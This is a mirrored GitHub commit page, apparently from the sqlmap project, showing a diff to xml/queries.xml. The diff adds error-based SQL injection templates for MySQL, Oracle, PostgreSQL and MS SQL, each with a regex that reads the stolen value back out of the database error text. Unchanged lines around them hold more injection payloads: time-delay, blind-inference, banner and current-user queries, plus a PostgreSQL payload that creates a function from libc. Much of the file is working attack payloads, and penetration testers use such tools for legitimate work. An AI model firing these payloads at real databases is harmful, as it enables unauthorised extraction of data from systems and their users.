Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit d123bb7

Browse files
stamparmstamparm
committed
added error based queries for MySQL, Postgre, MS SQL and Oracle
1 parent 8b8fff4 commit d123bb7

1 file changed

Lines changed: 4 additions & 0 deletions

File tree

xml/queries.xml

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -24,6 +24,7 @@
2424
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
2525
<substring query="MID((%s), %d, %d)"/>
2626
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
27+
<error query="AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((%s),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+)' for key"/>
2728
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
2829
<banner query="SELECT VERSION()"/>
2930
<current_user query="SELECT CURRENT_USER()"/>
@@ -90,6 +91,7 @@
9091
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
9192
<substring query="SUBSTR((%s), %d, %d)"/>
9293
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
94+
<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(58)||CHR(58)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+)::"/>
9395
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
9496
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
9597
<current_user query="SELECT USER FROM DUAL"/>
@@ -173,6 +175,7 @@
173175
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
174176
<substring query="SUBSTR((%s)::text, %d, %d)"/>
175177
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
178+
<error query="AND 1=CAST((%s)::text AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+)&quot;"/>
176179
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
177180
<banner query="SELECT VERSION()"/>
178181
<current_user query="SELECT CURRENT_USER"/>
@@ -239,6 +242,7 @@
239242
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
240243
<substring query="SUBSTRING((%s), %d, %d)"/>
241244
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
245+
<error query="AND 1=CONVERT(INT,(%s))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+)' to data type int"/>
242246
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
243247
<banner query="SELECT @@VERSION"/>
244248
<current_user query="SELECT SYSTEM_USER"/>

0 commit comments

Comments
 (0)